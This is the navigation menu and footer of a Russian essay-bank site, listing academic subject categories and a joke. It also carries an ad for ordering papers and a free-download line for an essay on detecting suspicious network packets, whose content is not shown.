8Государственное регулирование и налоги
 
9Естествознание
 
10Журналистика
 
11Законодательство и право
12Адвокатура
13Административное право
14Арбитражное процессуальное право
15Банковское право
16Государство и право
17Гражданское право и процесс
18Жилищное право
19Законодательство зарубежных стран
20Земельное право
21Конституционное право
22Конституционное право зарубежных стран
23Международное право
24Муниципальное право
25Налоговое право
26Римское право
27Семейное право
28Таможенное право
29Трудовое право
30Уголовное право и процесс
31Финансовое право
32Хозяйственное право
33Экологическое право
34Юриспруденция
 
35Иностранные языки
36Информатика, информационные технологии
37Базы данных
38Компьютерные сети
39Программирование
40Искусство и культура
41Краеведение
42Культурология
43Музыка
44История
45Биографии
46Историческая личность
47Литература
 
48Маркетинг и реклама
49Математика
50Медицина и здоровье
51Менеджмент
52Антикризисное управление
53Делопроизводство и документооборот
54Логистика
 
55Педагогика
56Политология
57Правоохранительные органы
58Криминалистика и криминология
59Прочее
60Психология
61Юридическая психология
 
62Радиоэлектроника
63Религия
 
64Сельское хозяйство и землепользование
65Социология
66Страхование
 
67Технологии
68Материаловедение
69Машиностроение
70Металлургия
71Транспорт
72Туризм
 
73Физика
74Физкультура и спорт
75Философия
 
76Химия
 
77Экология, охрана природы
78Экономика и финансы
79Анализ хозяйственной деятельности
80Банковское дело и кредитование
81Биржевое дело
82Бухгалтерский учет и аудит
83История экономических учений
84Международные отношения
85Предпринимательство, бизнес, микроэкономика
86Финансы
87Ценные бумаги и фондовый рынок
88Экономика предприятия
89Экономико-математическое моделирование
90Экономическая теория

 Анекдоты - это почти как рефераты, только короткие и смешные Следующий
С грандиозным размахом был отмечен Конец Света в России.
Правительство обещает сделать праздник ежегодным ...
Anekdot.ru

Узнайте стоимость курсовой, диплома, реферата на заказ.

Обратите внимание, реферат по компьютерным сетям "Определение подозрительных пакетов, анализ протоколов сети", также как и все другие рефераты, курсовые, дипломные и другие работы вы можете скачать бесплатно.

Смотрите также:


Банк рефератов - РефератБанк.ру
© РефератБанк, 2002 - 2016
Рейтинг@Mail.ru